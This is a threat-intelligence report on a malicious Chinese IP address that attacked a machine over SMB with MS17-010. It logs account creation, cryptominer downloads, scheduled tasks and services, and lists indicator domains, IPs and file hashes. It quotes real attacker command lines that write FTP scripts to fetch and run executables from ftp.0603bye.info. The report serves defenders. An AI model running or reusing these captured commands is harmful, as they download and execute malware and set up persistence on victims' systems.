IP Address: 117.107.174.98Malicious
Browse or download a weekly review of our cyber threat intelligence data and gain more insight to help protect your network
IP Address:
117.107.174.98
Malicious
This IP address attempted an attack on a machine protected by Guardicore Centra
Role |
Attacker, Scanner |
Services Targeted |
SMB |
Tags |
Access Suspicious Domain User Removed SMB Null Session Login Driver Start Download File IDS - Attempted Administrator Privilege Gain User Created Outgoing Connection DNS Query Service Start Driver Creation PowerShell MS17-010 User Added to Group Known Malware SMB System File Modification Scheduled Task Creation Service Configuration Download and Execute Service Creation Service Stop Listening CMD |
Associated Attack Servers |
js.1226bye.xyz worldsender.info pool.minexmr.com ctldl.windowsupdate.com grinknowledge.com apps.identrust.com ip.seeip.org 139.5.177.10 173.247.239.186 74.222.14.94 223.25.247.240 173.208.172.202 |
IP Address |
117.107.174.98 |
|
Domain |
- |
|
ISP |
Beijing Education Information Network |
|
Country |
China |
|
WHOIS |
Created Date |
- |
Updated Date |
- |
|
Organization |
- |
First seen in Guardicore Centra |
2019-09-02 |
Last seen in Guardicore Centra |
2020-11-09 |
What is Guardicore CentraGuardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More
IDS detected Attempted Administrator Privilege Gain : Windows SMB remote code execution attempt |
IDS - Attempted Administrator Privilege Gain |
The machine was exploited using the ms17-010 vulnerability |
|
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 74.222.14.94:80 |
Outgoing Connection |
PowerShell session started by c:\windows\system32\windowspowershell\v1.0\powershell.exe 2 times |
|
User admin$ was created with the password ************* and added to groups: Administrators |
User Added to Group User Created |
Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 139.5.177.10:80, 173.247.239.186:80 and 74.222.14.94:80 |
Outgoing Connection |
The file C:\Windows\System32\ok.exe was downloaded and executed |
Download and Execute |
The file C:\Windows\System32\upsupx.exe was downloaded and executed |
Download and Execute |
Process c:\windows\system32\upsupx.exe started listening on ports: 32831 |
Listening |
Process c:\windows\system32\u.exe generated outgoing network traffic to: 223.25.247.240:80 |
Outgoing Connection |
Process c:\windows\system32\u.exe attempted to access suspicious domains: worldsender.info |
Outgoing Connection Access Suspicious Domain |
System file C:\Windows\AppCompat\Programs\Amcache.hve was modified |
System File Modification |
The file C:\Windows\Inf\lsmm.exe was downloaded and executed |
Download and Execute |
Process c:\windows\inf\lsmm.exe started listening on ports: 32832 |
Listening |
Process c:\windows\inf\lsmm.exe attempted to access domains: pool.minexmr.com |
DNS Query |
The file C:\Windows\Inf\msiefs.exe was downloaded and executed |
Download and Execute |
The file C:\Windows\System\msinfo.exe was downloaded and executed 2 times |
Download and Execute |
The file C:\Windows\SysWOW64\wpcap.dll was downloaded and loaded by c:\windows\system\msinfo.exe |
Download and Execute |
The file C:\Windows\SysWOW64\npptools.dll was downloaded and loaded by c:\windows\system\msinfo.exe |
Download and Execute |
The command line c:\windows\system\my1.bat was scheduled to run by modifying C:\Windows\Tasks\my1.job |
|
c:\windows\system32\services.exe installed and started c:\windows\system\msinfo.exe as a service named xWinWpdSrv under service group None |
Service Start Service Creation |
The command line c:\windows\system\my1.bat was scheduled to run by modifying C:\Windows\System32\Tasks\my1 |
|
Service netprofm was stopped |
Service Stop |
Service NlaSvc was stopped |
Service Stop |
Process c:\windows\system\msinfo.exe attempted to access suspicious domains: ip.seeip.org |
DNS Query Access Suspicious Domain |
Process c:\windows\system\msinfo.exe attempted to access domains: apps.identrust.com and ctldl.windowsupdate.com |
DNS Query |
csrs.exe was downloaded |
Download File |
Process c:\windows\system32\regsvr32.exe attempted to access suspicious domains: js.1226bye.xyz |
DNS Query Access Suspicious Domain |
The file C:\Windows\System32\drivers\npf.sys was downloaded and loaded by system |
Download and Execute |
c:\windows\system32\services.exe installed and started system32\drivers\npf.sys as a service named NPF under service group None |
Driver Start Service Creation |
The command line cmd /c echo open ftp.0603bye.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe was scheduled to run by modifying C:\Windows\System32\Tasks\Mysa |
|
The command line rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa was scheduled to run by modifying C:\Windows\System32\Tasks\Mysa1 |
|
The command line cmd /c echo open ftp.0603bye.info>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p was scheduled to run by modifying C:\Windows\System32\Tasks\Mysa2 |
|
The command line cmd /c echo open ftp.0603bye.info>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe was scheduled to run by modifying C:\Windows\System32\Tasks\Mysa3 |
|
The command line rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa was scheduled to run by modifying C:\Windows\System32\Tasks\ok |
|
Connection was closed due to timeout |
|
C:\Windows\System32\ok.exe |
SHA256: a3bb132ab1ba3e706b90d6fb514504105f174c4e444e87be7bce1995f798044d |
2241024 bytes |
C:\Windows\Inf\lsmm.exe |
SHA256: 8246293a368a1da86aba696bea93460705ca4c40aa4c75dde909b8d9dff5efcb |
1270272 bytes |
C:\Windows\SysWOW64\wpcap.dll |
SHA256: b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9 |
282360 bytes |
C:\Windows\SysWOW64\npptools.dll |
SHA256: 366b77df76729d08687051c1ec4b718ba1d650bca5b16eb15ec5c11570d6ff16 |
48128 bytes |
C:\Windows\System\msinfo.exe |
SHA256: 7ec433dd0454553b09f11c39944e251e3ee32e4981f52f02adc3011eb0ce6537 |
4887552 bytes |
C:\Windows\System32\drivers\npf.sys |
SHA256: 4bfaa99393f635cd05d91a64de73edb5639412c129e049f0fe34f88517a10fc6 |
36600 bytes |
C:\Windows\Temp\conhost.exe |
SHA256: 790c213e1227adefd2d564217de86ac9fe660946e1240b5415c55770a951abfd |
221184 bytes |
C:\Windows\Inf\msiefs.exe |
SHA256: e8ddefd237646a47debc01df9aa02fbcae40686f96b7860511c73798c7546201 |
305276 bytes |
IP Address: 117.107.174.98Malicious